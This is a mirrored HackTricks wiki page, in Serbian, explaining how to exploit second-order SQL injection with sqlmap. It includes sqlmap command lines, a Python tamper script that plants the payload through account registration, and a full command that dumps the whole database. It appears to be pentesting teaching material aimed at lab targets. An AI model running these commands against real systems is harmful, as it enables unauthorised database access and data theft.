maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md

74 lines
3.3 KiB
Markdown
Raw Blame History

{{#include ../../../banners/hacktricks-training.md}}
**SQLMap može iskoristiti Second Order SQLis.**\
Potrebno je obezbediti:
- **zahtev** gde će **sqlinjection payload** biti sačuvan
- **zahtev** gde će **payload** biti **izvršen**
Zahtev gde je SQL injection payload sačuvan je **označen kao u bilo kojoj drugoj injekciji u sqlmap**. Zahtev **gde sqlmap može pročitati izlaz/izvršenje** injekcije može se označiti sa `--second-url` ili sa `--second-req` ako treba da označite kompletan zahtev iz datoteke.
**Jednostavan primer drugog reda:**
```bash
#Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"
#Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt
```
U nekoliko slučajeva **to neće biti dovoljno** jer ćete morati da **izvršite druge radnje** pored slanja payload-a i pristupanja drugoj stranici.
Kada je to potrebno, možete koristiti **sqlmap tamper**. Na primer, sledeći skript će registrovati novog korisnika **koristeći sqlmap payload kao email** i odjaviti se.
```python
#!/usr/bin/env python
import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def login_account(payload):
proxies = {'http':'http://127.0.0.1:8080'}
cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
url = "http://10.10.10.10/create.php"
pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
url = "http://10.10.10.10/exit.php"
pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
def tamper(payload, **kwargs):
headers = kwargs.get("headers", {})
login_account(payload)
return payload
```
A **SQLMap tamper se uvek izvršava pre nego što započne pokušaj injekcije sa payload-om** **i mora da vrati payload**. U ovom slučaju nam nije stalo do payload-a, već nam je stalo do slanja nekih zahteva, tako da se payload ne menja.
Dakle, ako iz nekog razloga trebamo složeniji tok za iskorišćavanje druge vrste SQL injekcije kao što je:
- Kreirati nalog sa SQLi payload-om unutar "email" polja
- Odjaviti se
- Prijaviti se sa tim nalogom (login.txt)
- Poslati zahtev za izvršavanje SQL injekcije (second.txt)
**Ova sqlmap linija će pomoći:**
```bash
sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
##########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all
```
{{#include ../../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink